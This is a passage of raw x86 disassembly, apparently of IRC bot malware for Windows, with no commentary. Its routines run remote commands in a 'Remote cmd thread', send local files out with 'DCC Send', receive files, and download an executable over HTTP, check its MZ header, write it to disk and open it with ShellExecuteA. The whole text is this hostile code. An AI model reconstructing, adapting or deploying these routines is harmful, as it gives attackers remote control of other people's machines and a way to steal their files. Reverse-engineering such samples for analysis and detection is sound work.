mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_4], eax
jmp short loc_401CCD
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: sub_401981+337�j
mov [ebp+var_4], 200h
loc_401CCD: ; CODE XREF: sub_401981+343�j
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
lea eax, [ebp+var_31C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_204]
push eax
push ds:dword_41DEF4
call ds:dword_417088 ; ReadFile
test eax, eax
jnz short loc_401D08
jmp short loc_401D22
; ---------------------------------------------------------------------------
loc_401D08: ; CODE XREF: sub_401981+383�j
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401D22: ; CODE XREF: sub_401981+238�j
; sub_401981+291�j ...
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
locret_401D35: ; CODE XREF: sub_401981+67�j
; sub_401981+BB�j ...
leave
retn 4
sub_401981 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D39 proc near ; CODE XREF: sub_401D6E+AF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push [ebp+arg_0]
push ds:dword_41DEF0
call ds:dword_417068 ; WriteFile
test eax, eax
jnz short loc_401D69
xor eax, eax
jmp short locret_401D6C
; ---------------------------------------------------------------------------
loc_401D69: ; CODE XREF: sub_401D39+2A�j
push 1
pop eax
locret_401D6C: ; CODE XREF: sub_401D39+2E�j
leave
retn
sub_401D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D6E proc near ; CODE XREF: sub_40A9CF+14A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_401DA6
cmp [ebp+arg_4], 0
jnz short loc_401D8B
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401D8B: ; CODE XREF: sub_401D6E+16�j
push 0
push 0
push 0
push [ebp+arg_4]
push offset aOpen ; "open"
push 0
call ds:dword_4171D0 ; ShellExecuteA
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401DA6: ; CODE XREF: sub_401D6E+10�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401DBC
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401DBC: ; CODE XREF: sub_401D6E+4A�j
cmp [ebp+arg_4], 0
jz short loc_401DD9
push 200h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
loc_401DD9: ; CODE XREF: sub_401D6E+52�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_405F67
pop ecx
pop ecx
push offset aRemoteCmdThrea ; "Remote cmd thread"
push 1
push [ebp+var_4]
push offset sub_401981
call sub_4095A4
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_401E0B
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401E0B: ; CODE XREF: sub_401D6E+99�j
push offset asc_418214 ; "\r\n"
push [ebp+arg_4]
call sub_416B70 ; strcat
pop ecx
pop ecx
push [ebp+arg_4]
call sub_401D39
pop ecx
test eax, eax
jnz short locret_401E36
push offset aErrorWhileExec ; "Error while executing command."
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
locret_401E36: ; CODE XREF: sub_401D6E+18�j
; sub_401D6E+33�j ...
leave
retn
sub_401D6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E38 proc near ; DATA XREF: sub_4024F3+10B�o
var_614 = qword ptr -614h
var_60C = qword ptr -60Ch
var_604 = dword ptr -604h
var_600 = dword ptr -600h
var_5FC = dword ptr -5FCh
var_5F8 = dword ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = dword ptr -5E8h
var_5E4 = dword ptr -5E4h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5BB = byte ptr -5BBh
var_4B7 = byte ptr -4B7h
var_3B7 = byte ptr -3B7h
var_3AD = byte ptr -3ADh
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 604h
push 3D6h
push [ebp+arg_0]
lea eax, [ebp+var_5E0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_5BB]
push eax
call ds:dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_5BB]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_5E4], eax
cmp [ebp+var_5E4], 0
jnz short loc_401EA3
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: sub_401E38+56�j
push 2710h
push 0
lea eax, [ebp+var_3B7]
push eax
lea eax, [ebp+var_4B7]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_401EEE
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EEE: ; CODE XREF: sub_401E38+95�j
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
mov eax, [ebp+var_5E0]
push dword ptr [eax]
push offset dword_418280
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_5E8], eax
and [ebp+var_204], 0
loc_401F2A: ; CODE XREF: sub_401E38:loc_401FD8�j
push 0
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+var_208]
call ds:dword_417248 ; recv
mov [ebp+var_5F0], eax
cmp [ebp+var_5F0], 0
jz short loc_401F5F
cmp [ebp+var_5F0], 200h
jbe short loc_401F61
loc_401F5F: ; CODE XREF: sub_401E38+119�j
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401F61: ; CODE XREF: sub_401E38+125�j
mov eax, [ebp+var_204]
add eax, [ebp+var_5F0]
mov [ebp+var_204], eax
push [ebp+var_204]
call ds:dword_41724C ; ntohl
mov [ebp+var_5F4], eax
push 4
lea eax, [ebp+var_5F4]
push eax
push [ebp+var_208]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5E4]
push [ebp+var_5F0]
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B7C ; fwrite
add esp, 10h
cmp [ebp+var_5F0], 200h
jnb short loc_401FC7
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401FC7: ; CODE XREF: sub_401E38+18B�j
mov eax, [ebp+var_5E0]
cmp dword ptr [eax+4], 0
jz short loc_401FD8
jmp loc_4020BC
; ---------------------------------------------------------------------------
loc_401FD8: ; CODE XREF: sub_401E38+199�j
jmp loc_401F2A
; ---------------------------------------------------------------------------
loc_401FDD: ; CODE XREF: sub_401E38:loc_401F5F�j
; sub_401E38+18D�j
push [ebp+var_5E4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_5EC], eax
call sub_416B64 ; clock
cmp [ebp+var_5E8], eax
jnz short loc_402008
call sub_416B64 ; clock
dec eax
mov [ebp+var_5E8], eax
loc_402008: ; CODE XREF: sub_401E38+1C2�j
mov eax, [ebp+var_5EC]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_5F8], eax
fild [ebp+var_5F8]
fstp [ebp+var_5FC]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_600], eax
fild [ebp+var_600]
fdiv ds:flt_417270
fdivr [ebp+var_5FC]
push ecx
push ecx
fstp [esp+60Ch+var_60C]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_604], eax
fild [ebp+var_604]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+614h+var_614]
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
push offset dword_418234
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 20h
loc_402094: ; CODE XREF: sub_401E38:loc_4020BC�j
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_208]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4020BE
; ---------------------------------------------------------------------------
loc_4020BC: ; CODE XREF: sub_401E38+19B�j
jmp short loc_402094
; ---------------------------------------------------------------------------
locret_4020BE: ; CODE XREF: sub_401E38+66�j
; sub_401E38+B1�j ...
leave
retn 4
sub_401E38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C2 proc near ; DATA XREF: sub_40260D+7C�o
var_A2C = qword ptr -0A2Ch
var_A24 = qword ptr -0A24h
var_A1C = dword ptr -0A1Ch
var_A18 = dword ptr -0A18h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = byte ptr -0A04h
var_9FC = dword ptr -9FCh
var_9F8 = dword ptr -9F8h
var_9F4 = dword ptr -9F4h
var_9F0 = byte ptr -9F0h
var_8EC = dword ptr -8ECh
var_8E8 = dword ptr -8E8h
var_8E4 = dword ptr -8E4h
var_8E0 = byte ptr -8E0h
var_8BF = byte ptr -8BFh
var_8BE = byte ptr -8BEh
var_7BB = byte ptr -7BBh
var_618 = dword ptr -618h
var_614 = byte ptr -614h
var_210 = byte ptr -210h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A1Ch
push 2CCh
push [ebp+arg_0]
lea eax, [ebp+var_8E4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_8BF]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_9F8], eax
jmp short loc_40210D
; ---------------------------------------------------------------------------
loc_402100: ; CODE XREF: sub_4020C2:loc_40215E�j
mov eax, [ebp+var_9F8]
dec eax
mov [ebp+var_9F8], eax
loc_40210D: ; CODE XREF: sub_4020C2+3C�j
cmp [ebp+var_9F8], 0
jnz short loc_40212D
lea eax, [ebp+var_8BF]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40212D: ; CODE XREF: sub_4020C2+52�j
mov eax, [ebp+var_9F8]
movsx eax, [ebp+eax+var_8BF]
cmp eax, 5Ch
jnz short loc_40215E
mov eax, [ebp+var_9F8]
lea eax, [ebp+eax+var_8BE]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40215E: ; CODE XREF: sub_4020C2+7C�j
jmp short loc_402100
; ---------------------------------------------------------------------------
loc_402160: ; CODE XREF: sub_4020C2+69�j
; sub_4020C2+9A�j
mov [ebp+var_8E8], 10h
lea eax, [ebp+var_8E8]
push eax
lea eax, [ebp+var_10]
push eax
call sub_40CF25
push eax
call ds:dword_417240 ; getsockname
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_614]
push eax
push [ebp+var_8E8]
lea eax, [ebp+var_10]
push eax
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jz short loc_4021BA
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_4021BA: ; CODE XREF: sub_4020C2+E3�j
push 0Ah
lea eax, [ebp+var_A04]
push eax
push 1388h
push 400h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
lea eax, [ebp+var_A04]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_9FC], eax
cmp [ebp+var_9FC], 0
jnz short loc_40220F
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40220F: ; CODE XREF: sub_4020C2+138�j
push offset aRb ; "rb"
lea eax, [ebp+var_8BF]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8EC], eax
cmp [ebp+var_8EC], 0
jnz short loc_402250
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_402250: ; CODE XREF: sub_4020C2+16D�j
push 2
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_8EC]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_A08], eax
push 0
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
lea eax, [ebp+var_614]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset aDccSendSS ; "DCC Send %s (%s)"
lea eax, [ebp+var_8E0]
push eax
call sub_40D420
add esp, 10h
push [ebp+var_A08]
lea eax, [ebp+var_A04]
push eax
lea eax, [ebp+var_614]
push eax
call ds:dword_417244 ; inet_addr
push eax
call ds:dword_41724C ; ntohl
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_418348
lea eax, [ebp+var_8E0]
push eax
call sub_40D4AB
add esp, 18h
push 0EA60h
push [ebp+var_9FC]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_618], eax
cmp [ebp+var_618], 0
jz short loc_40230F
cmp [ebp+var_618], 0FFFFFFFFh
jnz short loc_40233A
loc_40230F: ; CODE XREF: sub_4020C2+242�j
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_4020C2+24B�j
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
mov eax, [ebp+var_8E4]
push dword ptr [eax]
push offset dword_418320
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_9F4], eax
loc_40236F: ; CODE XREF: sub_4020C2:loc_40240D�j
push [ebp+var_8EC]
push 200h
push 1
lea eax, [ebp+var_210]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_A0C], eax
cmp [ebp+var_A0C], 0
jz short loc_4023A6
cmp [ebp+var_A0C], 200h
jbe short loc_4023A8
loc_4023A6: ; CODE XREF: sub_4020C2+2D6�j
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023A8: ; CODE XREF: sub_4020C2+2E2�j
push [ebp+var_A0C]
lea eax, [ebp+var_210]
push eax
push [ebp+var_618]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4023EE
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182F4
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 10h
jmp loc_4024ED
; ---------------------------------------------------------------------------
loc_4023EE: ; CODE XREF: sub_4020C2+303�j
cmp [ebp+var_A0C], 200h
jnb short loc_4023FC
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023FC: ; CODE XREF: sub_4020C2+336�j
mov eax, [ebp+var_8E4]
cmp dword ptr [eax+4], 0
jz short loc_40240D
jmp loc_4024EB
; ---------------------------------------------------------------------------
loc_40240D: ; CODE XREF: sub_4020C2+344�j
jmp loc_40236F
; ---------------------------------------------------------------------------
loc_402412: ; CODE XREF: sub_4020C2:loc_4023A6�j
; sub_4020C2+338�j
call sub_416B64 ; clock
cmp [ebp+var_9F4], eax
jnz short loc_40242B
call sub_416B64 ; clock
dec eax
mov [ebp+var_9F4], eax
loc_40242B: ; CODE XREF: sub_4020C2+35B�j
mov eax, [ebp+var_A08]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_A10], eax
fild [ebp+var_A10]
fstp [ebp+var_A14]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A18], eax
fild [ebp+var_A18]
fdiv ds:flt_417270
fdivr [ebp+var_A14]
push ecx
push ecx
fstp [esp+0A24h+var_A24]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A1C], eax
fild [ebp+var_A1C]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+0A2Ch+var_A2C]
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182B0
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 20h
loc_4024B7: ; CODE XREF: sub_4020C2:loc_4024EB�j
; sub_4020C2:loc_4024ED�j
push [ebp+var_618]
call sub_40538D
pop ecx
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4024EF
; ---------------------------------------------------------------------------
loc_4024EB: ; CODE XREF: sub_4020C2+346�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
loc_4024ED: ; CODE XREF: sub_4020C2+327�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
locret_4024EF: ; CODE XREF: sub_4020C2+F3�j
; sub_4020C2+148�j ...
leave
retn 4
sub_4020C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F3 proc near ; CODE XREF: sub_40D871+203�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_402511
cmp [ebp+arg_8], 0
jz short loc_402511
cmp [ebp+arg_C], 0
jz short loc_402511
cmp [ebp+arg_10], 0
jnz short loc_402516
loc_402511: ; CODE XREF: sub_4024F3+A�j
; sub_4024F3+10�j ...
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402516: ; CODE XREF: sub_4024F3+1C�j
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_402531
cmp [ebp+var_8], 0FFFFh
jbe short loc_402536
loc_402531: ; CODE XREF: sub_4024F3+33�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402536: ; CODE XREF: sub_4024F3+3C�j
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_402551
cmp [ebp+var_8], 40000000h
jbe short loc_402556
loc_402551: ; CODE XREF: sub_4024F3+53�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402556: ; CODE XREF: sub_4024F3+5C�j
push 3D6h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40256F
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_40256F: ; CODE XREF: sub_4024F3+75�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 100h
push [ebp+arg_C]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 6
push [ebp+arg_10]
mov eax, [ebp+var_4]
add eax, 229h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+22Fh], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 233h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_41837C
push 0
push [ebp+var_4]
push offset sub_401E38
call sub_4095A4
add esp, 18h
locret_40260B: ; CODE XREF: sub_4024F3:loc_402511�j
; sub_4024F3:loc_402531�j ...
leave
retn
sub_4024F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40260D proc near ; CODE XREF: sub_40A9CF+98E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jz short loc_40261D
cmp [ebp+arg_8], 0
jnz short loc_40261F
loc_40261D: ; CODE XREF: sub_40260D+8�j
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_40261F: ; CODE XREF: sub_40260D+E�j
push 2CCh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_402635
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_402635: ; CODE XREF: sub_40260D+24�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4183A0
push 0
push [ebp+var_4]
push offset sub_4020C2
call sub_4095A4
add esp, 18h
locret_402696: ; CODE XREF: sub_40260D:loc_40261D�j
; sub_40260D+26�j
leave
retn
sub_40260D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402698 proc near ; CODE XREF: sub_402A32+5C9�p
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 420h
push 2710h
push 0
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_414], eax
cmp [ebp+var_414], 0
jnz short loc_4026CC
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4026CC: ; CODE XREF: sub_402698+2B�j
push [ebp+arg_8]
push [ebp+arg_10]
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 401h
lea eax, [ebp+var_404]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_4053BF
add esp, 0Ch
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402745
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_402758
loc_402745: ; CODE XREF: sub_402698+A2�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_402758: ; CODE XREF: sub_402698+AB�j
push offset asc_4183EC ; "\r\n\r\n"
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_40278D
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40278D: ; CODE XREF: sub_402698+E0�j
mov eax, [ebp+var_410]
add eax, 4
mov [ebp+var_410], eax
push offset aContentLength ; "Content-Length: "
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_40C], eax
cmp [ebp+var_40C], 0
jz short loc_4027CC
mov eax, [ebp+var_40C]
cmp eax, [ebp+var_410]
jbe short loc_4027DF
loc_4027CC: ; CODE XREF: sub_402698+124�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4027DF: ; CODE XREF: sub_402698+132�j
and [ebp+var_41C], 0
lea eax, [ebp+var_41C]
push eax
push offset aContentLengthU ; "Content-Length: %u\r\n"
push [ebp+var_40C]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_408], eax
cmp [ebp+var_408], 1
jnz short loc_402818
cmp [ebp+var_41C], 0
jnz short loc_40282B
loc_402818: ; CODE XREF: sub_402698+175�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40282B: ; CODE XREF: sub_402698+17E�j
cmp [ebp+arg_1C], 0
jz short loc_40285D
cmp [ebp+var_41C], 2
jb short loc_40284A
mov eax, [ebp+var_410]
movzx eax, word ptr [eax]
cmp eax, 5A4Dh
jz short loc_40285D
loc_40284A: ; CODE XREF: sub_402698+1A0�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40285D: ; CODE XREF: sub_402698+197�j
; sub_402698+1B0�j
cmp [ebp+arg_18], 0
jz short loc_40286E
mov eax, [ebp+arg_18]
mov ecx, [ebp+var_41C]
mov [eax], ecx
loc_40286E: ; CODE XREF: sub_402698+1C9�j
push [ebp+arg_14]
call sub_4167B9
pop ecx
test eax, eax
jz short loc_40288E
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40288E: ; CODE XREF: sub_402698+1E1�j
push offset dword_4182AC
push [ebp+arg_14]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 0
jnz short loc_4028BF
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4028BF: ; CODE XREF: sub_402698+212�j
push [ebp+var_418]
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
push ecx
push 1
push [ebp+var_410]
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
mov eax, [ebp+var_41C]
sub eax, ecx
mov [ebp+var_41C], eax
loc_402910: ; CODE XREF: sub_402698:loc_402A1D�j
cmp [ebp+arg_20], 0
jz short loc_40293F
mov eax, [ebp+arg_20]
cmp dword ptr [eax+4], 0
jz short loc_40293F
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40293F: ; CODE XREF: sub_402698+27C�j
; sub_402698+285�j
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402976
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_40299E
loc_402976: ; CODE XREF: sub_402698+2D3�j
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push [ebp+arg_14]
call ds:dword_4170AC ; DeleteFileA
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40299E: ; CODE XREF: sub_402698+2DC�j
mov eax, [ebp+var_420]
cmp eax, [ebp+var_41C]
jbe short loc_4029C8
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_4029C8: ; CODE XREF: sub_402698+312�j
push [ebp+var_418]
push [ebp+var_420]
push 1
lea eax, [ebp+var_404]
push eax
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_41C]
sub eax, [ebp+var_420]
mov [ebp+var_41C], eax
cmp [ebp+var_41C], 0
jnz short loc_402A1D
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_402A1D: ; CODE XREF: sub_402698+366�j
jmp loc_402910
; ---------------------------------------------------------------------------
locret_402A22: ; CODE XREF: sub_402698+2F�j
; sub_402698+BB�j ...
leave
retn
sub_402698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A24 proc near ; CODE XREF: sub_402A32+625�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
